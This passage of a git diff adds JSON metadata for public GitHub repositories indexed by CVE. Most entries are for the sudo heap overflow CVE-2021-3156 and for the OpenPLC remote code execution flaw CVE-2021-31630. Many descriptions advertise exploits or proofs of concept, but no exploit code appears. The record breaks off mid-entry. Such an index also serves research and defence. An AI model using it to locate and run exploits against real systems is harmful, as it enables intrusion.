"watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 419229376, + "name": "CVE-2021-3156", + "full_name": "halissha\/CVE-2021-3156", + "owner": { + "login": "halissha", + "id": 68551861, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68551861?v=4", + "html_url": "https:\/\/github.com\/halissha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/halissha\/CVE-2021-3156", + "description": "CVE-2021-3156 exploit", + "fork": false, + "created_at": "2021-10-20T07:34:53Z", + "updated_at": "2021-10-20T07:49:13Z", + "pushed_at": "2021-10-20T07:48:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 423517851, + "name": "Baron-Samedit", + "full_name": "sharkmoos\/Baron-Samedit", + "owner": { + "login": "sharkmoos", + "id": 23018541, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23018541?v=4", + "html_url": "https:\/\/github.com\/sharkmoos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sharkmoos\/Baron-Samedit", + "description": "Exploit and Demo system for CVE-2021-3156", + "fork": false, + "created_at": "2021-11-01T15:30:41Z", + "updated_at": "2022-08-21T09:02:36Z", + "pushed_at": "2022-01-23T16:37:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452513353, + "name": "CVE-2021-3156", + "full_name": "chenaotian\/CVE-2021-3156", + "owner": { + "login": "chenaotian", + "id": 86546351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86546351?v=4", + "html_url": "https:\/\/github.com\/chenaotian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chenaotian\/CVE-2021-3156", + "description": "CVE-2021-3156 POC and Docker and Analysis write up", + "fork": false, + "created_at": "2022-01-27T02:31:43Z", + "updated_at": "2024-08-12T20:20:06Z", + "pushed_at": "2022-05-23T01:51:14Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 459014327, + "name": "SudoScience", + "full_name": "ret2basic\/SudoScience", + "owner": { + "login": "ret2basic", + "id": 59381775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59381775?v=4", + "html_url": "https:\/\/github.com\/ret2basic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ret2basic\/SudoScience", + "description": "CVE-2021-3156 deep dive.", + "fork": false, + "created_at": "2022-02-14T04:24:03Z", + "updated_at": "2022-04-08T08:32:31Z", + "pushed_at": "2022-04-08T08:32:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 466126446, + "name": "CVE-2021-3156", + "full_name": "puckiestyle\/CVE-2021-3156", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2022-03-04T13:06:51Z", + "updated_at": "2022-06-12T04:07:19Z", + "pushed_at": "2022-03-04T13:11:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468145866, + "name": "CVE-2021-3156", + "full_name": "barebackbandit\/CVE-2021-3156", + "owner": { + "login": "barebackbandit", + "id": 30201584, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30201584?v=4", + "html_url": "https:\/\/github.com\/barebackbandit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/barebackbandit\/CVE-2021-3156", + "description": "Exploit for CVE-2021-3156", + "fork": false, + "created_at": "2022-03-10T01:03:47Z", + "updated_at": "2022-01-30T06:58:31Z", + "pushed_at": "2022-01-30T06:58:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 471181143, + "name": "CVE-2021-3156", + "full_name": "RodricBr\/CVE-2021-3156", + "owner": { + "login": "RodricBr", + "id": 72948934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72948934?v=4", + "html_url": "https:\/\/github.com\/RodricBr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RodricBr\/CVE-2021-3156", + "description": "CVE-2021-3156", + "fork": false, + "created_at": "2022-03-18T00:05:48Z", + "updated_at": "2022-03-19T12:58:55Z", + "pushed_at": "2022-08-19T20:56:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 472565119, + "name": "heaplens", + "full_name": "ypl6\/heaplens", + "owner": { + "login": "ypl6", + "id": 24860299, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24860299?v=4", + "html_url": "https:\/\/github.com\/ypl6", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ypl6\/heaplens", + "description": "CMPT733 Cybersecurity Lab II Project: GDB plugin for heap exploits inspired by CVE-2021-3156", + "fork": false, + "created_at": "2022-03-22T00:55:51Z", + "updated_at": "2022-04-13T03:38:58Z", + "pushed_at": "2022-04-13T01:16:07Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 496459351, + "name": "CVE-2021-3156", + "full_name": "q77190858\/CVE-2021-3156", + "owner": { + "login": "q77190858", + "id": 10094838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10094838?v=4", + "html_url": "https:\/\/github.com\/q77190858", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/q77190858\/CVE-2021-3156", + "description": "sudo提权漏洞CVE-2021-3156复现代码", + "fork": false, + "created_at": "2022-05-26T02:47:53Z", + "updated_at": "2022-05-26T08:31:05Z", + "pushed_at": "2022-05-26T02:49:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 506991349, + "name": "CVE-2021-3156", + "full_name": "arvindshima\/CVE-2021-3156", + "owner": { + "login": "arvindshima", + "id": 88944344, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88944344?v=4", + "html_url": "https:\/\/github.com\/arvindshima", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/arvindshima\/CVE-2021-3156", + "description": "CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit)", + "fork": false, + "created_at": "2022-06-24T11:50:40Z", + "updated_at": "2022-06-24T12:00:19Z", + "pushed_at": "2022-06-24T11:55:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 510379940, + "name": "CVE-2021-3156", + "full_name": "Mhackiori\/CVE-2021-3156", + "owner": { + "login": "Mhackiori", + "id": 73738800, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73738800?v=4", + "html_url": "https:\/\/github.com\/Mhackiori", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mhackiori\/CVE-2021-3156", + "description": "Visualization, Fuzzing, Exploit and Patch of Baron Samedit Vulnerability", + "fork": false, + "created_at": "2022-07-04T13:55:24Z", + "updated_at": "2024-11-25T05:54:59Z", + "pushed_at": "2022-07-15T04:41:17Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-3156", + "pwn", + "sudo" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 561329535, + "name": "CVE-2021-3156-centos7", + "full_name": "PhuketIsland\/CVE-2021-3156-centos7", + "owner": { + "login": "PhuketIsland", + "id": 28825226, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28825226?v=4", + "html_url": "https:\/\/github.com\/PhuketIsland", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PhuketIsland\/CVE-2021-3156-centos7", + "description": "利用sudo提权,只针对cnetos7", + "fork": false, + "created_at": "2022-11-03T13:10:23Z", + "updated_at": "2023-12-27T07:31:39Z", + "pushed_at": "2022-11-03T13:52:35Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 26, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 571582101, + "name": "clif", + "full_name": "0x4ndy\/clif", + "owner": { + "login": "0x4ndy", + "id": 40269655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40269655?v=4", + "html_url": "https:\/\/github.com\/0x4ndy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x4ndy\/clif", + "description": "clif is a command-line interface (CLI) application fuzzer, pretty much what wfuzz or ffuf are for web. It was inspired by sudo vulnerability CVE-2021-3156 and the fact that for some reasons, Google's afl-fuzz doesn't allow for unlimited argument or option specification.", + "fork": false, + "created_at": "2022-11-28T12:52:11Z", + "updated_at": "2024-10-21T10:38:35Z", + "pushed_at": "2022-12-22T12:38:31Z", + "stargazers_count": 98, + "watchers_count": 98, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 98, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 581961241, + "name": "CVE-2021-3156", + "full_name": "hycheng15\/CVE-2021-3156", + "owner": { + "login": "hycheng15", + "id": 74200918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74200918?v=4", + "html_url": "https:\/\/github.com\/hycheng15", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hycheng15\/CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2022-12-25T03:58:20Z", + "updated_at": "2022-12-25T06:19:54Z", + "pushed_at": "2023-11-14T10:24:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 639593327, + "name": "CVE-2021-3156", + "full_name": "mutur4\/CVE-2021-3156", + "owner": { + "login": "mutur4", + "id": 68686790, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68686790?v=4", + "html_url": "https:\/\/github.com\/mutur4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mutur4\/CVE-2021-3156", + "description": "Baron SameEdit Heap Overflow LPE 1-Day Exploit", + "fork": false, + "created_at": "2023-05-11T19:38:16Z", + "updated_at": "2024-02-10T19:16:59Z", + "pushed_at": "2024-04-10T14:50:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 640090227, + "name": "PE_CVE-CVE-2021-3156", + "full_name": "PurpleOzone\/PE_CVE-CVE-2021-3156", + "owner": { + "login": "PurpleOzone", + "id": 111320119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111320119?v=4", + "html_url": "https:\/\/github.com\/PurpleOzone", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PurpleOzone\/PE_CVE-CVE-2021-3156", + "description": "Exploit for Ubuntu 20.04 using CVE-2021-3156 enhanced with post-exploitation scripts", + "fork": false, + "created_at": "2023-05-13T01:02:32Z", + "updated_at": "2024-10-20T12:44:50Z", + "pushed_at": "2023-05-13T07:48:55Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 687513603, + "name": "CVE-2021-3156", + "full_name": "asepsaepdin\/CVE-2021-3156", + "owner": { + "login": "asepsaepdin", + "id": 122620685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122620685?v=4", + "html_url": "https:\/\/github.com\/asepsaepdin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asepsaepdin\/CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2023-09-05T14:06:26Z", + "updated_at": "2023-09-05T14:23:34Z", + "pushed_at": "2023-09-05T14:23:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736124550, + "name": "CVE-2021-3156", + "full_name": "DDayLuong\/CVE-2021-3156", + "owner": { + "login": "DDayLuong", + "id": 154918019, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154918019?v=4", + "html_url": "https:\/\/github.com\/DDayLuong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DDayLuong\/CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2023-12-27T03:52:17Z", + "updated_at": "2023-12-27T03:54:33Z", + "pushed_at": "2023-12-27T03:54:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 737283431, + "name": "DASICS-CVE-2021-3156", + "full_name": "DASICS-ICT\/DASICS-CVE-2021-3156", + "owner": { + "login": "DASICS-ICT", + "id": 119167360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119167360?v=4", + "html_url": "https:\/\/github.com\/DASICS-ICT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DASICS-ICT\/DASICS-CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2023-12-30T13:22:34Z", + "updated_at": "2024-07-02T03:29:27Z", + "pushed_at": "2024-01-22T01:02:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 746480394, + "name": "CVE-2021-3156", + "full_name": "wurwur\/CVE-2021-3156", + "owner": { + "login": "wurwur", + "id": 38003239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38003239?v=4", + "html_url": "https:\/\/github.com\/wurwur", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wurwur\/CVE-2021-3156", + "description": "Different files for computer security coursework", + "fork": false, + "created_at": "2024-01-22T04:42:34Z", + "updated_at": "2024-01-22T06:44:07Z", + "pushed_at": "2024-01-22T08:07:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 756290635, + "name": "LMU-CVE-2021-3156", + "full_name": "SamTruss\/LMU-CVE-2021-3156", + "owner": { + "login": "SamTruss", + "id": 46684055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46684055?v=4", + "html_url": "https:\/\/github.com\/SamTruss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SamTruss\/LMU-CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2024-02-12T11:24:31Z", + "updated_at": "2024-02-12T11:24:32Z", + "pushed_at": "2024-02-12T14:31:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 800600797, + "name": "CVE-2021-3156-checker", + "full_name": "lypd0\/CVE-2021-3156-checker", + "owner": { + "login": "lypd0", + "id": 146327014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146327014?v=4", + "html_url": "https:\/\/github.com\/lypd0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lypd0\/CVE-2021-3156-checker", + "description": "Checker for CVE-2021-3156 with static version check", + "fork": false, + "created_at": "2024-05-14T16:35:09Z", + "updated_at": "2024-06-23T13:14:26Z", + "pushed_at": "2024-05-14T17:04:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "checker", + "cve", + "cve-2021-3156", + "escalation", + "privesc", + "privilege", + "python" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823919078, + "name": "CVE-2021-3156", + "full_name": "Typical0day\/CVE-2021-3156", + "owner": { + "login": "Typical0day", + "id": 174670608, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174670608?v=4", + "html_url": "https:\/\/github.com\/Typical0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Typical0day\/CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2024-07-04T02:29:08Z", + "updated_at": "2024-07-08T01:49:54Z", + "pushed_at": "2024-07-08T01:49:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 856715099, + "name": "CVE-2021-3156", + "full_name": "acidburn2049\/CVE-2021-3156", + "owner": { + "login": "acidburn2049", + "id": 181438567, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/181438567?v=4", + "html_url": "https:\/\/github.com\/acidburn2049", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/acidburn2049\/CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2024-09-13T04:20:36Z", + "updated_at": "2024-09-13T04:20:37Z", + "pushed_at": "2024-09-13T04:20:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 887792818, + "name": "CVE-2021-3156-without-ip-command", + "full_name": "Bad3r\/CVE-2021-3156-without-ip-command", + "owner": { + "login": "Bad3r", + "id": 25513724, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25513724?v=4", + "html_url": "https:\/\/github.com\/Bad3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bad3r\/CVE-2021-3156-without-ip-command", + "description": "fork of worawit\/CVE-2021-3156 exploit_nss.py modified to work with ifconfig instead of the ip command", + "fork": false, + "created_at": "2024-11-13T09:47:02Z", + "updated_at": "2024-11-13T10:04:23Z", + "pushed_at": "2024-11-13T10:04:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3157.json b/2021/CVE-2021-3157.json new file mode 100644 index 0000000000..1f7e0ce913 --- /dev/null +++ b/2021/CVE-2021-3157.json @@ -0,0 +1,33 @@ +[ + { + "id": 333708745, + "name": "cve-2021-3157", + "full_name": "CrackerCat\/cve-2021-3157", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/cve-2021-3157", + "description": "脚本小子竟是我自己?", + "fork": false, + "created_at": "2021-01-28T09:27:49Z", + "updated_at": "2022-01-07T08:58:03Z", + "pushed_at": "2021-01-28T02:57:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-31589.json b/2021/CVE-2021-31589.json new file mode 100644 index 0000000000..004b6c25d1 --- /dev/null +++ b/2021/CVE-2021-31589.json @@ -0,0 +1,33 @@ +[ + { + "id": 629907373, + "name": "CVE-2021-31589", + "full_name": "karthi-the-hacker\/CVE-2021-31589", + "owner": { + "login": "karthi-the-hacker", + "id": 33289300, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33289300?v=4", + "html_url": "https:\/\/github.com\/karthi-the-hacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karthi-the-hacker\/CVE-2021-31589", + "description": "CVE-2021-31589 is a powerful scanner for bug bounty hunters and penetration testers to discover vulnerabilities in their web applications.", + "fork": false, + "created_at": "2023-04-19T09:10:40Z", + "updated_at": "2024-01-19T23:21:15Z", + "pushed_at": "2023-04-27T04:26:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-31630.json b/2021/CVE-2021-31630.json new file mode 100644 index 0000000000..f27a70c07a --- /dev/null +++ b/2021/CVE-2021-31630.json @@ -0,0 +1,317 @@ +[ + { + "id": 391818469, + "name": "CVE-2021-31630-OpenPLC_RCE", + "full_name": "hev0x\/CVE-2021-31630-OpenPLC_RCE", + "owner": { + "login": "hev0x", + "id": 6265911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6265911?v=4", + "html_url": "https:\/\/github.com\/hev0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hev0x\/CVE-2021-31630-OpenPLC_RCE", + "description": "Exploit for Authenticated Remote Code Execution on OpenPLC v3 Webserver", + "fork": false, + "created_at": "2021-08-02T04:48:24Z", + "updated_at": "2024-08-12T20:15:12Z", + "pushed_at": "2021-08-02T04:48:25Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 775165945, + "name": "CVE-2021-31630-HTB", + "full_name": "Hunt3r0x\/CVE-2021-31630-HTB", + "owner": { + "login": "Hunt3r0x", + "id": 106396603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106396603?v=4", + "html_url": "https:\/\/github.com\/Hunt3r0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hunt3r0x\/CVE-2021-31630-HTB", + "description": "proof of Concept (PoC) exploit for CVE-2021-31630, targeting the OpenPLC service running on the WifineticTwo box on the Hack The Box platform.", + "fork": false, + "created_at": "2024-03-20T22:02:53Z", + "updated_at": "2024-11-20T19:01:18Z", + "pushed_at": "2024-03-21T15:50:45Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779013491, + "name": "cve-2021-31630", + "full_name": "thewhiteh4t\/cve-2021-31630", + "owner": { + "login": "thewhiteh4t", + "id": 36354846, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36354846?v=4", + "html_url": "https:\/\/github.com\/thewhiteh4t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thewhiteh4t\/cve-2021-31630", + "description": "Python script for exploiting command injection in Open PLC Webserver v3", + "fork": false, + "created_at": "2024-03-28T21:31:45Z", + "updated_at": "2024-10-29T02:45:45Z", + "pushed_at": "2024-07-12T00:16:13Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "openplc", + "rce" + ], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 782064396, + "name": "htb-wifinetictwo-exploit", + "full_name": "behindsecurity\/htb-wifinetictwo-exploit", + "owner": { + "login": "behindsecurity", + "id": 32421959, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32421959?v=4", + "html_url": "https:\/\/github.com\/behindsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/behindsecurity\/htb-wifinetictwo-exploit", + "description": "A simple python script to exploit CVE-2021-31630 on HTB WifineticTwo CTF", + "fork": false, + "created_at": "2024-04-04T15:12:57Z", + "updated_at": "2024-09-18T21:06:48Z", + "pushed_at": "2024-04-04T16:29:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786978803, + "name": "CVE-2021-31630", + "full_name": "mind2hex\/CVE-2021-31630", + "owner": { + "login": "mind2hex", + "id": 51345640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51345640?v=4", + "html_url": "https:\/\/github.com\/mind2hex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mind2hex\/CVE-2021-31630", + "description": "OpenPLC 3 WebServer Authenticated Remote Code Execution.", + "fork": false, + "created_at": "2024-04-15T16:55:30Z", + "updated_at": "2024-04-15T16:56:49Z", + "pushed_at": "2024-04-15T17:07:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 800033894, + "name": "CVE-2021-31630-PoC", + "full_name": "sealldeveloper\/CVE-2021-31630-PoC", + "owner": { + "login": "sealldeveloper", + "id": 120470330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120470330?v=4", + "html_url": "https:\/\/github.com\/sealldeveloper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sealldeveloper\/CVE-2021-31630-PoC", + "description": "A version of the PoC for CVE-2021-31630 from https:\/\/github.com\/Hunt3r0x\/CVE-2021-31630-HTB but without the political messages, because they are unneccessary.", + "fork": false, + "created_at": "2024-05-13T15:17:38Z", + "updated_at": "2024-05-13T15:21:58Z", + "pushed_at": "2024-05-13T15:21:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810053844, + "name": "CVE-2021-31630", + "full_name": "junnythemarksman\/CVE-2021-31630", + "owner": { + "login": "junnythemarksman", + "id": 20056452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20056452?v=4", + "html_url": "https:\/\/github.com\/junnythemarksman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/junnythemarksman\/CVE-2021-31630", + "description": "Modified the PoC CVE-2021-31630 script by Fellipe Oliveira for HTB ", + "fork": false, + "created_at": "2024-06-04T00:44:47Z", + "updated_at": 